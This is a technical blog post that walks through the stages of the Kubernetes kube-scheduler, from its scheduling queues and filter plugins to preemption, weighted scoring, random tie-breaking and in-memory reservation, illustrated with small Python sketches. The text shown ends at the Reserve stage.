<p>Your pod has just been written to etcd. The API server returned <code>201 Created</code>. The pod exists. But <code>spec.nodeName</code> is still empty, and that is the entire reason this post exists.</p>
<p>A pod with no node is not a real workload. It is a row in a database. Something has to look at it, decide which machine should run it, and atomically claim that machine. That something is <code>kube-scheduler</code>, and the way it makes the decision is more interesting than "pick the node with the most free CPU."</p>
<p>There are thirteen separate stages in modern scheduling. The Filter stage alone runs fourteen in-tree plugins, each one capable of disqualifying a candidate node with a single <code>Unschedulable</code> verdict. There is no appeal, no second chance, no "best effort." Either every plugin says yes, or that node is out.</p>
<p>This post walks every stage end-to-end against the v1.36 source code, with verbatim outputs from a real cluster at the bottom.</p>
<p><a class="embed-card" href="https://youtu.be/N-dDSCVWdqU">https://youtu.be/N-dDSCVWdqU</a></p>

<h2>TL;DR, the 13 stages</h2>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/7fb30ce6-3772-4e67-806d-17f84cf940fa.png" alt="" style="display:block;margin:0 auto" />

<ol>
<li><p><strong>PreEnqueue.</strong> Gating plugins decide if the pod is even allowed into the queue. SchedulingGates lives here. If a gate is set, the pod waits.</p>
</li>
<li><p><strong>QueueSort.</strong> The activeQ orders pods by priority. Higher priority first.</p>
</li>
<li><p><strong>PreFilter.</strong> Eleven plugins precompute what the pod actually wants. Resources, affinity terms, topology spread, all stashed in CycleState. Compute once, read many times.</p>
</li>
<li><p><strong>Filter.</strong> Fourteen plugins each test every node in parallel. NodeUnschedulable, NodeName, TaintToleration, NodeAffinity, NodePorts, NodeResourcesFit, VolumeRestrictions, NodeVolumeLimits, VolumeBinding, VolumeZone, PodTopologySpread, InterPodAffinity, DynamicResources, NodeDeclaredFeatures. One Unschedulable verdict and the node is out.</p>
</li>
<li><p><strong>PostFilter.</strong> Only fires if every node failed Filter. DefaultPreemption asks, "if I evicted some lower-priority pods, could this one fit?" If yes, it picks victims and the pod retries next cycle.</p>
</li>
<li><p><strong>PreScore.</strong> Same trick as PreFilter. Plugins that do heavy per-node work during scoring precompute once and cache.</p>
</li>
<li><p><strong>Score.</strong> Nine plugins rate every surviving node, zero to one hundred. In parallel. Each plugin has a weight. TaintToleration is three. NodeAffinity, InterPodAffinity, PodTopologySpread, DynamicResources are all two. Rest are one.</p>
</li>
<li><p><strong>NormalizeScore.</strong> Rescales every plugin's output. Then for each node, multiply scores by weights, add it all up. Highest sum wins. Ties? Broken at random. Yes, random. Deterministic ties would hot-spot the same node every time.</p>
</li>
<li><p><strong>Reserve.</strong> The scheduler subtracts the pod's requests from the winning node's in-memory snapshot. So the next pod in the same cycle sees that node as already loaded.</p>
</li>
<li><p><strong>Permit.</strong> A hook. A plugin can Approve, Wait, or Reject. Stock cluster, no-op. But Kueue, Volcano, Coscheduling all wait here for gang scheduling.</p>
</li>
<li><p><strong>PreBind.</strong> Last chance to do work before the API server gets told. VolumeBinding finalizes PVC binds here.</p>
</li>
<li><p><strong>Bind.</strong> The DefaultBinder sets <code>spec.nodeName</code> on the pod via the API server. Now etcd has the assignment.</p>
</li>
<li><p><strong>PostBind.</strong> Cleanup. The pod is gone from the scheduler's queue.</p>
</li>
</ol>
<p>That is the whole walkthrough. The rest of this post is the part that does not fit in a tweet.</p>
<h2>The scheduling framework</h2>
<p>Since Kubernetes 1.19, kube-scheduler has been built on top of the <strong>scheduling framework</strong> (KEP-624, beta in 1.18, GA in 1.19). The core of the binary is small and intentionally dumb. All of the actual decision-making lives in plugins, registered at well-defined extension points.</p>
<p>This separation is what makes the rest of the ecosystem possible. You can disable plugins. You can write your own as a Go module or behind a webhook. You can run multiple scheduler profiles side by side and let pods pick one with <code>spec.schedulerName</code>. Most installations never touch the configuration, but if you have ever wondered how Volcano, Kueue, or Coscheduling plug into the scheduler without forking it, this is the answer: they register against the framework's extension points and the core just calls them at the right time.</p>
<p>The thirteen extension points are not arbitrary. Each one corresponds to a moment in the pod's lifecycle where it makes sense to ask plugins a question. <em>Should this pod even enter the queue?</em> That is <code>PreEnqueue</code>. <em>Is this node a candidate?</em> That is <code>Filter</code>. <em>Among the candidates, which one is the best fit?</em> That is <code>Score</code>. The framework gives you the seam; the plugin fills in the logic.</p>
<h2>Three queues, before any plugin runs</h2>
<p>Before any plugin gets called, the pod has to make it into the right queue. The scheduler maintains three of them, and they each serve a different purpose.</p>
<p>The <strong>activeQ</strong> is a priority heap. Unscheduled pods are ordered by <code>spec.priority</code>, and the scheduler always pops from the head. Higher-priority pods cut in line, which is exactly what you want for things like critical control-plane pods or paid-tier workloads.</p>
<p>The <strong>backoffQ</strong> holds pods that just failed a scheduling attempt. They sit there for a small (and exponentially growing) timeout before being promoted back into the activeQ. This is not laziness; it is a correctness property. If a pod could not be scheduled in this cycle, retrying it immediately almost always fails the same way. Backoff lets the cluster state change first.</p>
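<p>The growth curve is easy to picture with a small Python sketch. The 1 second starting point and 10 second cap are assumptions here, matching what I understand the upstream defaults (<code>podInitialBackoffSeconds</code> and <code>podMaxBackoffSeconds</code>) to be; check your own scheduler configuration. <code>backoff_seconds</code> is a hypothetical helper, not scheduler code.</p>
<pre><code class="language-python">def backoff_seconds(attempts, initial=1.0, maximum=10.0):
    """Wait before retrying a pod that has failed `attempts` times (1 or more)."""
    # Doubles on every failed attempt, capped at `maximum`.
    return min(initial * 2 ** (attempts - 1), maximum)


print([backoff_seconds(n) for n in range(1, 7)])
# [1.0, 2.0, 4.0, 8.0, 10.0, 10.0]
</code></pre>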
<p>The <strong>unschedulableQ</strong> (the source actually calls it <code>unschedulablePods</code>, but the docs and the metrics use the queue suffix) is an indexed map of pods that have been declared unschedulable for now. These pods do not retry on a timer. They retry on <em>events</em>. If a new node is added, an informer event fires <code>MoveAllToActiveOrBackoffQueue</code> and they all get a fresh shot. Same thing if a pod is deleted and frees up resources. There is also a five-minute fallback timer for pods that have been waiting too long, in case the event stream missed an update.</p>
<p>All three queues live in <code>pkg/scheduler/backend/queue/scheduling_queue.go</code>. Their names are also exposed as labels on the <code>scheduler_pending_pods</code> metric, which is the easiest way to debug a stuck cluster: a queue full of pods in <code>Unschedulable</code> is telling you something different than a queue full of pods in <code>Backoff</code>.</p>
<h2>Stage 1: PreEnqueue (the gate)</h2>
<p>PreEnqueue plugins decide whether a pod is even allowed into the activeQ. If any plugin returns <code>Unschedulable</code>, the pod sits in the unschedulableQ until something causes its gate to clear.</p>
<p>The canonical example is the <code>SchedulingGates</code> plugin. By setting <code>spec.schedulingGates</code> on a pod, you can create the pod object now but defer its scheduling until you explicitly remove the gate. This pattern shows up in batch workloads, in cost-aware scheduling controllers, and in anything that wants to express "this pod exists but isn't ready to run yet."</p>
<p>Most pods sail through PreEnqueue with no gates set, but it is the very first checkpoint and worth knowing about.</p>
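<p>Stripped to its core, the gate check is a single condition. A toy Python sketch, with pods as plain dictionaries and a made-up gate name (<code>example.com/quota</code>); the real plugin works on typed Pod objects:</p>
<pre><code class="language-python">def pre_enqueue(pod):
    """Allow the pod into the activeQ only when no scheduling gates remain."""
    return not pod.get("schedulingGates")


pod = {"name": "batch-job", "schedulingGates": [{"name": "example.com/quota"}]}
print(pre_enqueue(pod))   # False, the pod waits

pod["schedulingGates"] = []   # a controller removes the gate
print(pre_enqueue(pod))   # True, the pod may enter the activeQ
</code></pre>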
<h2>Stage 2: QueueSort (the order)</h2>
<p>Pods waiting in the activeQ have to be ordered somehow. QueueSort plugins define that order. The default is <code>PrioritySort</code>: it ranks pods by <code>spec.priority</code> (an integer) descending, and falls back to creation timestamp for ties, so the older pod wins when priorities are equal.</p>
<p>There is one plugin, it does one thing, and you almost never want to change it. It deserves a sentence in your mental model, not much more.</p>
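<p>The ordering rule can be sketched with Python's <code>heapq</code>. This is a toy model of the activeQ, with pods reduced to a name, a priority, and a creation time; <code>push</code> and <code>pop</code> are hypothetical helpers.</p>
<pre><code class="language-python">import heapq


def push(active_q, name, priority, created):
    # heapq is a min-heap: negate priority so the highest pops first, and
    # let the creation time break ties in favour of the older pod.
    heapq.heappush(active_q, (-priority, created, name))


def pop(active_q):
    return heapq.heappop(active_q)[2]


active_q = []
push(active_q, "batch", 0, created=100)
push(active_q, "web-new", 100, created=250)
push(active_q, "critical", 1000, created=300)
push(active_q, "web-old", 100, created=200)
order = [pop(active_q) for _ in range(4)]
print(order)  # ['critical', 'web-old', 'web-new', 'batch']
</code></pre>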
<h2>Stage 3: PreFilter (cache once)</h2>
<p>Once a pod is popped off the activeQ, the scheduler's first real job is to look at what the pod actually wants. That is PreFilter, and it runs exactly once per pod per cycle.</p>
<p>The default profile registers eleven PreFilter plugins, each one extracting a different facet of the pod's requirements: <code>NodeResourcesFit</code> pulls out CPU, memory, and extended-resource requests; <code>NodeAffinity</code> normalizes the affinity term tree; <code>PodTopologySpread</code> builds its per-topology-key constraint sets; <code>InterPodAffinity</code> walks the affinity and anti-affinity rules; <code>VolumeBinding</code> figures out which PVCs still need binding; and so on.</p>
<p>All of this work is cached in a <code>framework.CycleState</code> object. Think of <code>CycleState</code> as a per-pod scratch pad: compute the expensive things once, read them many times. The reason it matters becomes obvious in the next stage, where each plugin is about to be called several thousand times in tight loops.</p>
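<p>Here is the compute-once, read-many idea as a minimal Python sketch. The class below only borrows the name <code>CycleState</code>; its <code>write</code>/<code>read</code> methods, the dictionary-shaped pods and nodes, and the <code>"requests"</code> key are all simplifications I made up for illustration.</p>
<pre><code class="language-python">class CycleState:
    """Per-pod scratch pad that lives for one scheduling cycle."""

    def __init__(self):
        self._data = {}

    def write(self, key, value):
        self._data[key] = value

    def read(self, key):
        return self._data[key]


def pre_filter(pod, state):
    """Sum the pod's container requests once and cache the result."""
    total = {}
    for container in pod["containers"]:
        for resource, amount in container["requests"].items():
            total[resource] = total.get(resource, 0) + amount
    state.write("requests", total)


def filter_node(node, state):
    """Cheap per-node check that only reads the cached totals."""
    requests = state.read("requests")
    return all(
        max(amount - node["free"].get(resource, 0), 0) == 0  # no shortfall
        for resource, amount in requests.items()
    )


pod = {"containers": [{"requests": {"cpu": 500, "memory": 256}},
                      {"requests": {"cpu": 250, "memory": 128}}]}
state = CycleState()
pre_filter(pod, state)   # runs once per cycle
nodes = [{"name": "n1", "free": {"cpu": 1000, "memory": 512}},
         {"name": "n2", "free": {"cpu": 500, "memory": 512}}]
print([n["name"] for n in nodes if filter_node(n, state)])  # ['n1']
</code></pre>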
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/88736042-0bb3-46e9-a6cf-822b6673f209.png" alt="" style="display:block;margin:0 auto" />

<h2>Stage 4: Filter (every node, every plugin, in parallel)</h2>
<p>Filter is where the bulk of the scheduling work actually happens. Fourteen plugins are called against every candidate node, in parallel, and any single <code>Unschedulable</code> verdict eliminates that node from the rest of the cycle.</p>
<p>Here is the verified list, straight from <code>pkg/scheduler/apis/config/testing/defaults/defaults.go</code>:</p>
<ol>
<li><p><code>NodeUnschedulable</code></p>
</li>
<li><p><code>NodeName</code></p>
</li>
<li><p><code>TaintToleration</code></p>
</li>
<li><p><code>NodeAffinity</code></p>
</li>
<li><p><code>NodePorts</code></p>
</li>
<li><p><code>NodeResourcesFit</code></p>
</li>
<li><p><code>VolumeRestrictions</code></p>
</li>
<li><p><code>NodeVolumeLimits</code></p>
</li>
<li><p><code>VolumeBinding</code></p>
</li>
<li><p><code>VolumeZone</code></p>
</li>
<li><p><code>PodTopologySpread</code></p>
</li>
<li><p><code>InterPodAffinity</code></p>
</li>
<li><p><code>DynamicResources</code> (DRA, GA since 1.34)</p>
</li>
<li><p><code>NodeDeclaredFeatures</code></p>
</li>
</ol>
<p>Each plugin receives the pod, the candidate node's info, and the <code>CycleState</code> that PreFilter built up. Each plugin returns <code>Success</code> or <code>Unschedulable</code>. If any of them says <code>Unschedulable</code>, that node is gone. There is no aggregation, no scoring at this stage, no "well, three out of four said yes." It is binary, and that is what makes Filter fast: the scheduler fans out across nodes in parallel, runs the plugins for each node in order, and short-circuits on the first failure for that node.</p>
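<p>A toy Python version of that veto logic, with three stand-in plugins instead of fourteen. The function names echo the real plugins, but the bodies are my own simplifications over plain dictionaries, and the loop over nodes is sequential here where the scheduler works on nodes in parallel.</p>
<pre><code class="language-python">def node_unschedulable(pod, node):
    return not node.get("unschedulable", False)


def node_name(pod, node):
    return pod.get("nodeName") in (None, node["name"])


def node_ports(pod, node):
    return set(pod.get("hostPorts", [])).isdisjoint(node.get("usedPorts", []))


FILTERS = [node_unschedulable, node_name, node_ports]


def first_rejection(pod, node):
    """Name of the first plugin that rejects the node, or None if all pass."""
    for plugin in FILTERS:
        if not plugin(pod, node):
            return plugin.__name__   # short-circuit: later plugins never run
    return None


def feasible_nodes(pod, nodes):
    return [n["name"] for n in nodes if first_rejection(pod, n) is None]


pod = {"hostPorts": [8080]}
nodes = [
    {"name": "n1", "unschedulable": True},
    {"name": "n2", "usedPorts": [8080]},
    {"name": "n3"},
]
print(feasible_nodes(pod, nodes))      # ['n3']
print(first_rejection(pod, nodes[1]))  # node_ports
</code></pre>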
<p>Most engineers will only ever care about a handful of these by name. A quick tour:</p>
<p><code>NodeUnschedulable</code> is the first line of defense. If the node has <code>spec.unschedulable: true</code>, this plugin filters it out. That is exactly what <code>kubectl cordon</code> does.</p>
<p><code>NodeName</code> is the simplest possible filter. If the pod has <code>spec.nodeName</code> set (you can set it manually and skip the scheduler entirely), only that node passes; the scheduler effectively becomes a no-op.</p>
<p><code>TaintToleration</code> is the one most engineers will recognize. The node has taints, the pod has tolerations, and any unmatched <code>NoSchedule</code> or <code>NoExecute</code> taint kills candidacy. The "GPU node" pattern in the demo at the bottom of this post is just a <code>NoSchedule</code> taint that nothing tolerates.</p>
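<p>The matching rule is worth seeing once in code. This Python sketch covers the common cases only (key, operator, value, effect) and is not the upstream implementation; the <code>gpu</code> taint key and both helper names are hypothetical.</p>
<pre><code class="language-python">HARD_EFFECTS = ("NoSchedule", "NoExecute")


def tolerates(toleration, taint):
    """True if one toleration matches one taint (simplified matching rules)."""
    if toleration.get("effect") not in (None, taint["effect"]):
        return False
    if toleration.get("key") not in (None, taint["key"]):
        return False
    if toleration.get("operator", "Equal") == "Exists":
        return True
    return toleration.get("value") == taint.get("value")


def passes_taint_filter(tolerations, taints):
    """Every NoSchedule/NoExecute taint needs at least one matching toleration."""
    hard = [t for t in taints if t["effect"] in HARD_EFFECTS]
    return all(any(tolerates(tol, t) for tol in tolerations) for t in hard)


gpu_taint = {"key": "gpu", "value": "true", "effect": "NoSchedule"}
print(passes_taint_filter([], [gpu_taint]))                                      # False
print(passes_taint_filter([{"key": "gpu", "operator": "Exists"}], [gpu_taint]))  # True
</code></pre>
<p>A <code>PreferNoSchedule</code> taint never blocks a node in this check; it only matters later, at scoring time.</p>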
<p><code>NodeAffinity</code> evaluates the pod's <code>spec.affinity.nodeAffinity</code> rules. Required affinity terms must match here at Filter; preferred terms get scored later.</p>
<p><code>NodeResourcesFit</code> is the one most people intuitively understand. Does the node have enough free CPU, memory, and any other Kubernetes resource (hugepages, GPUs, custom resources) to fit the pod's requests? Notably, only requests are considered, not limits, which is why a node can be massively over-subscribed on limits and the scheduler still happily places more pods.</p>
<p><code>VolumeBinding</code> deserves a paragraph of its own. If the pod has PVCs that are not yet bound, VolumeBinding has to decide whether each unbound PVC <em>could</em> be bound on this specific node. For a <code>WaitForFirstConsumer</code> storage class the answer depends on zone, on the storage backend's topology, and on which PVs exist. VolumeBinding doesn't just filter; it also remembers the provisioning plan it chose, and that plan gets locked in during the Reserve stage further down.</p>
<p><code>DynamicResources</code> is the new kid on the block. It implements the DRA framework, which went GA in 1.34. If your pod uses ResourceClaims (the modern way to ask for GPUs and other devices), DynamicResources is the plugin that figures out whether a node can satisfy the claim.</p>
<p><code>NodeDeclaredFeatures</code> is newer still. It compares features the node has declared against the pod's required features, and is feature-gated in some configurations.</p>
<p>Run all 14 plugins against every node, with the nodes checked in parallel, collect the verdicts, and whatever survives all 14 votes moves on. If nothing survives, the scheduler doesn't give up: it runs PostFilter.</p>
<h2>Stage 5: PostFilter (preemption, the expensive escape hatch)</h2>
<p>If every node failed Filter, the scheduler is in trouble. The pod is unschedulable on the cluster as it stands today. PostFilter exists for exactly this case, and the default plugin is <code>DefaultPreemption</code>. It asks a single question: <em>if I evicted some lower-priority pods, could this one fit?</em></p>
<p>The algorithm sounds simple but is genuinely expensive. For each node, the scheduler:</p>
<ol>
<li><p>Gathers all pods on the node with priority lower than the pending pod.</p>
</li>
<li><p>Simulates evicting them one at a time, lowest priority first.</p>
</li>
<li><p>After each simulated eviction, re-runs Filter on the hypothetical state.</p>
</li>
<li><p>If the pod becomes schedulable, the node is a candidate, and the minimum set of pods that need to die is recorded.</p>
</li>
</ol>
<p>After all candidate nodes have been evaluated, the scheduler picks the "best" one: fewest victims, lowest victim priority, latest creation time as a tiebreaker. The exact ordering lives in <code>pkg/scheduler/framework/plugins/defaultpreemption/default_preemption.go</code>.</p>
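<p>The dry run described above can be sketched in Python. This is a deliberately small model: "fits" means CPU only rather than a full Filter re-run, the only tiebreak is fewest victims, and <code>victims_for</code> and <code>pick_node</code> are hypothetical names, not functions from the scheduler.</p>
<pre><code class="language-python">import bisect


def victims_for(pending, node):
    """Pods to evict so `pending` fits on `node`; None if eviction cannot help."""
    pods = sorted(node["pods"], key=lambda p: p["priority"])
    # Pods before `cutoff` have strictly lower priority than the pending pod.
    cutoff = bisect.bisect_left([p["priority"] for p in pods], pending["priority"])
    free = node["cpu"] - sum(p["cpu"] for p in pods)
    missing = max(pending["cpu"] - free, 0)
    victims = []
    for pod in pods[:cutoff]:   # simulate evictions, lowest priority first
        if missing == 0:
            break
        victims.append(pod["name"])
        missing = max(missing - pod["cpu"], 0)
    return victims if missing == 0 else None


def pick_node(pending, nodes):
    """Choose the candidate node with the fewest victims (the only tiebreak here)."""
    plans = {n["name"]: victims_for(pending, n) for n in nodes}
    candidates = {name: v for name, v in plans.items() if v}
    if not candidates:
        return None
    best = min(candidates, key=lambda name: len(candidates[name]))
    return best, candidates[best]


pending = {"name": "api", "priority": 100, "cpu": 2}
nodes = [
    {"name": "a", "cpu": 4, "pods": [{"name": "low", "priority": 0, "cpu": 2},
                                     {"name": "mid", "priority": 50, "cpu": 2}]},
    {"name": "b", "cpu": 4, "pods": [{"name": "high", "priority": 200, "cpu": 4}]},
    {"name": "c", "cpu": 2, "pods": [{"name": "x", "priority": 0, "cpu": 1},
                                     {"name": "y", "priority": 10, "cpu": 1}]},
]
print(pick_node(pending, nodes))  # ('a', ['low'])
</code></pre>
<p>Node <code>b</code> is never a candidate because its only pod outranks the pending one, and node <code>c</code> loses to <code>a</code> because it would cost two victims instead of one.</p>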
<p>Once a candidate is picked, two things happen. The scheduler sets <code>nominatedNodeName</code> on the pending pod, so anyone watching the API can see this pod is targeting a specific node. Then it gracefully deletes the victims through the API server, respecting their <code>terminationGracePeriodSeconds</code>. The pending pod itself goes back into the activeQ to be retried in the next cycle.</p>
<p>This whole process is <em>expensive</em>. The first Filter sweep already touched every node. Now the scheduler is running Filter again, multiple times, against simulated state per candidate. Tens to hundreds of milliseconds easily, seconds on large clusters. The good news is that the vast majority of pods never hit this path; they schedule cleanly on the first try.</p>
<p>PostFilter has a second plugin now: <code>DynamicResources</code>. Same idea, but for ResourceClaims rather than pods. If a Filter cycle failed because of a claim that is busy, DynamicResources' PostFilter can deallocate idle claims to make room.</p>
<h2>Stage 6: PreScore (cache once again)</h2>
<p>Filter has done its work. Maybe four nodes are left, maybe forty. Either way, it is time to score them, and the scheduler reuses the same precompute trick from PreFilter.</p>
<p>Some Score plugins do expensive per-node work. To avoid recomputing the same input data once per node, those plugins do their work once in PreScore and stash the result in <code>CycleState</code>. The default PreScore plugins are <code>TaintToleration</code>, <code>NodeAffinity</code>, <code>NodeResourcesFit</code>, <code>VolumeBinding</code>, <code>PodTopologySpread</code>, <code>InterPodAffinity</code>, and <code>NodeResourcesBalancedAllocation</code>.</p>
<p><code>InterPodAffinity</code> is the heaviest of the bunch. It walks the cluster's existing pods, builds a topology map of where each pod sits, and converts the new pod's affinity rules into an indexed structure. <code>PodTopologySpread</code> does similar work, building per-topology-key counts.</p>
<p>After PreScore, each individual Score call becomes effectively O(1): a lookup against precomputed state. Without it, scoring large clusters would be unworkable.</p>
<h2>Stage 7: Score (the leaderboard, weighted)</h2>
<p>Now the actual ranking. Every Score plugin rates every surviving node from 0 to 100, in parallel.</p>
<p>The default Score plugins, with weights:</p>
<ul>
<li><p><code>TaintToleration</code>, weight 3</p>
</li>
<li><p><code>NodeAffinity</code>, weight 2</p>
</li>
<li><p><code>NodeResourcesFit</code>, weight 1</p>
</li>
<li><p><code>VolumeBinding</code>, weight 1</p>
</li>
<li><p><code>PodTopologySpread</code>, weight 2</p>
</li>
<li><p><code>InterPodAffinity</code>, weight 2</p>
</li>
<li><p><code>DynamicResources</code>, weight 2</p>
</li>
<li><p><code>NodeResourcesBalancedAllocation</code>, weight 1</p>
</li>
<li><p><code>ImageLocality</code>, weight 1</p>
</li>
</ul>
<p>That is nine plugins. All verified against <code>defaults.go</code>.</p>
<p>The weights are not arbitrary. The source comments explain the reasoning: <code>TaintToleration</code> is tripled because user-expressed taint preference is a strong signal. <code>NodeAffinity</code>, <code>PodTopologySpread</code>, <code>InterPodAffinity</code>, and <code>DynamicResources</code> are doubled because they encode user intent. The rest are weight 1 because they are infrastructure-level signals (balance, cache hits) that should influence the decision but not dominate it.</p>
<p>It is worth zooming in on <code>ImageLocality</code> for a moment. Once you understand it, you start noticing its effect everywhere.</p>
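<p>ImageLocality asks one question per node: how much of this pod's container images do you already have cached? A node that already holds the images scores up to 100; a node that holds none of them scores 0. The score is graded rather than strictly all-or-nothing, since larger cached images count for more.</p>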
<p>It matters because on a cold node, the kubelet has to pull the image over the network: seconds for a small image, tens of seconds for a fat ML or LLM image. On a warm node, the pod starts in milliseconds. ImageLocality is a soft preference (it doesn't filter), but it nudges the scheduler toward already-warm nodes when other things are equal, and the cumulative effect on workload startup latency is huge.</p>
<p><code>NodeResourcesFit</code> is the resource-balance plugin you've probably tuned at some point. By default it uses <code>LeastAllocated</code>, which prefers nodes with more free capacity (spreading the load). You can flip it to <code>MostAllocated</code> for bin-packing, or to <code>RequestedToCapacityRatio</code> for custom curves, via <code>KubeSchedulerConfiguration</code>.</p>
<p><code>NodeResourcesBalancedAllocation</code> is subtler. It rewards nodes whose CPU and memory utilization are balanced. A node at 80% CPU and 20% memory scores <em>worse</em> than a node at 50%/50%, because imbalanced nodes are more likely to fragment future scheduling decisions.</p>
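<p>To make the difference between these strategies concrete, here is a minimal Python sketch of the arithmetic. It is a simplification, not the scheduler's Go code: it looks at a single resource for <code>LeastAllocated</code> and <code>MostAllocated</code>, uses integer percentages, and models only the two-resource (CPU and memory) case for balanced allocation. The function names are made up for this example.</p>
<pre><code class="language-python">def least_allocated(requested, allocatable):
    """More free capacity after placement gives a higher score (spreading)."""
    return (allocatable - requested) * 100 // allocatable


def most_allocated(requested, allocatable):
    """Less free capacity after placement gives a higher score (bin-packing)."""
    return requested * 100 // allocatable


def balanced_allocation(cpu_pct, mem_pct):
    """Penalise the gap between CPU and memory utilisation (two resources)."""
    return 100 - abs(cpu_pct - mem_pct) // 2


# 2000m requested on a node with 8000m allocatable.
print(least_allocated(2000, 8000), most_allocated(2000, 8000))   # 75 25
# The 80%/20% node loses to the 50%/50% node.
print(balanced_allocation(80, 20), balanced_allocation(50, 50))  # 70 100
</code></pre>
<p>The same request scores 75 under spreading and 25 under bin-packing, which is why flipping the strategy changes placement so visibly.</p>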
<h2>Stage 8: NormalizeScore and picking a winner</h2>
<p>All nine plugins have scored every surviving node. The scheduler now picks the winner.</p>
<p><code>NormalizeScore</code> rescales every plugin's output to a uniform 0 to 100 range. Some plugins return raw counts or other custom scales; this stage brings everything to the same units.</p>
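<p>As a rough illustration of what "rescaling" means here, this Python sketch maps raw per-node values onto 0 to 100 by dividing by the largest value, with an optional reversal for plugins where a lower raw value is better. It is a sketch under those assumptions, and <code>normalize</code> and the node names are made up for the example. Individual plugins are free to normalize differently.</p>
<pre><code class="language-python">def normalize(raw_scores, max_node_score=100, reverse=False):
    """Rescale raw per-node scores so the largest maps to max_node_score."""
    highest = max(raw_scores.values())
    normalized = {}
    for node, raw in raw_scores.items():
        # If every raw score is zero there is nothing to scale.
        scaled = raw * max_node_score // highest if highest else 0
        normalized[node] = max_node_score - scaled if reverse else scaled
    return normalized


raw = {"node-a": 2, "node-b": 4, "node-c": 8}  # e.g. raw match counts
print(normalize(raw))                # {'node-a': 25, 'node-b': 50, 'node-c': 100}
print(normalize(raw, reverse=True))  # {'node-a': 75, 'node-b': 50, 'node-c': 0}
</code></pre>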
<p>For each node, the scheduler then sums <code>score × weight</code> across all nine plugins. Highest sum wins.</p>
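<p>The weighted sum is easy to work through by hand. The Python sketch below uses the nine weights listed in Stage 7. The per-plugin scores for <code>node-a</code> and <code>node-b</code> are invented for illustration: both nodes score 50 everywhere, except that <code>node-a</code> has a 50-point lead on <code>ImageLocality</code> and <code>node-b</code> has a 20-point lead on <code>TaintToleration</code>.</p>
<pre><code class="language-python">WEIGHTS = {
    "TaintToleration": 3,
    "NodeAffinity": 2,
    "NodeResourcesFit": 1,
    "VolumeBinding": 1,
    "PodTopologySpread": 2,
    "InterPodAffinity": 2,
    "DynamicResources": 2,
    "NodeResourcesBalancedAllocation": 1,
    "ImageLocality": 1,
}


def total_score(plugin_scores):
    """Sum score x weight across every Score plugin."""
    return sum(plugin_scores[name] * weight for name, weight in WEIGHTS.items())


baseline = {name: 50 for name in WEIGHTS}
node_a = dict(baseline, ImageLocality=100)   # +50 on a weight-1 plugin
node_b = dict(baseline, TaintToleration=70)  # +20 on a weight-3 plugin

totals = {"node-a": total_score(node_a), "node-b": total_score(node_b)}
winner = max(totals, key=totals.get)
print(totals, winner)  # {'node-a': 800, 'node-b': 810} node-b
</code></pre>
<p>A 20-point lead on a weight-3 plugin beats a 50-point lead on a weight-1 plugin, which is the whole point of the weights.</p>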
<p>The interesting question is what happens when two nodes have exactly the same total. The scheduler picks one at random. Specifically, it uses reservoir sampling: as it walks the top-scoring nodes, the k-th tied node it sees replaces the current pick with probability 1/k (a <code>rand.Intn(k) == 0</code> check). The choice matters more than it might seem.</p>
<p>Random tie-breaking exists to prevent hot-spotting. Imagine two equally suitable nodes for a workload. If the scheduler always picked the first one in some deterministic order, every pod from that workload would pile onto the same node and the other one would sit empty. Randomization spreads the load.</p>
<p>Reservoir sampling matters because it gives every tied node the same chance of winning in a single pass, without building a separate list of candidates first. Go's <code>rand.Intn</code> is also safe to use here: it rejects out-of-range draws instead of taking a bare modulo, so it does not introduce the modulo bias that a naive <code>x % n</code> reduction has for non-power-of-two ranges. Over millions of scheduling decisions across a large cluster, even a small bias would become a real distribution skew.</p>
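<p>One common way to pick uniformly among tied candidates in a single pass is reservoir sampling. The sketch below is a Python illustration of that idea, not the scheduler's Go code. <code>pick_winner</code> and the node totals are made up for the example, and the seeded <code>random.Random</code> is only there to make runs repeatable.</p>
<pre><code class="language-python">import random


def pick_winner(totals, rng):
    """Return one node chosen uniformly among the top-scoring nodes."""
    best = max(totals.values())
    winner = None
    ties_seen = 0
    for node, score in totals.items():
        if score != best:
            continue
        ties_seen += 1
        # The k-th tied node replaces the current pick with probability 1/k.
        if rng.randrange(ties_seen) == 0:
            winner = node
    return winner


totals = {"node-a": 810, "node-b": 810, "node-c": 640}
picks = [pick_winner(totals, random.Random(seed)) for seed in range(1000)]
print(picks.count("node-a"), picks.count("node-b"), picks.count("node-c"))
</code></pre>
<p>Across many runs the two tied nodes should each win roughly half the time, and <code>node-c</code> never wins.</p>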
<h2>Stage 9: Reserve (claim the resources in memory, before the API knows)</h2>
<p>The winner is picked, but at this point the API server still does not know about the decision. As far as etcd is concerned, the pod is still unscheduled.</p>
<p>Reserve fixes that locally. The scheduler takes the winning node's in-memory snapshot and subtracts whatever the pod requested: CPU, memory, extended resources, PVCs that need binding.</p>
<p>A critical detail: the scheduler operates on <strong>requests</strong>, not limits. And if your pod has no requests at all, the scheduler does not invent defaults; that is <code>LimitRanger</code>'s job, much earlier at admission time. Here, Reserve subtracts whatever requests the pod has, even if that is zero. The scheduler's view of node capacity is purely request-based; a node could be massively over-subscribed on limits and the scheduler would never know or care.</p>
<p>The reason Reserve happens in memory <em>before</em> the bind is so the next pod's scheduling cycle sees this node as already loaded. Picture scaling a deployment to twenty replicas all at once: without Reserve, the scheduler's cache would still show the same node as fully free for every pod, and they would all pile onto it. Reserve makes the cache reflect the scheduler's intent immediately, even before etcd has acknowledged anything.</p>
<p>If anything fails after Reserve, <code>Unreserve</code> rolls it back. The in-memory subtraction is undone and the node looks free again.</p>
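<p>The effect of Reserve is easiest to see in a toy model. This Python sketch keeps an in-memory map of free CPU per node, always places the next pod on the emptiest node, and subtracts the request immediately. It is a deliberately small model: <code>SchedulerCache</code> and <code>schedule</code> are invented names, only CPU is tracked, and fit checks are assumed to have happened in Filter.</p>
<pre><code class="language-python">class SchedulerCache:
    """Toy in-memory view of free CPU (millicores) per node."""

    def __init__(self, free_millicpu):
        self.free = dict(free_millicpu)

    def reserve(self, node, millicpu):
        # Claim the resources locally, before any API call.
        self.free[node] -= millicpu

    def unreserve(self, node, millicpu):
        # Roll the claim back if a later stage fails.
        self.free[node] += millicpu


def schedule(cache, millicpu):
    node = max(cache.free, key=cache.free.get)  # emptiest node wins
    cache.reserve(node, millicpu)
    return node


cache = SchedulerCache({"kube-worker-1": 4000, "kube-worker-2": 4000})
placements = [schedule(cache, 1000) for _ in range(4)]
print(placements)  # alternates between the two workers

cache.unreserve("kube-worker-2", 1000)  # pretend the last bind failed
print(cache.free)  # {'kube-worker-1': 2000, 'kube-worker-2': 3000}
</code></pre>
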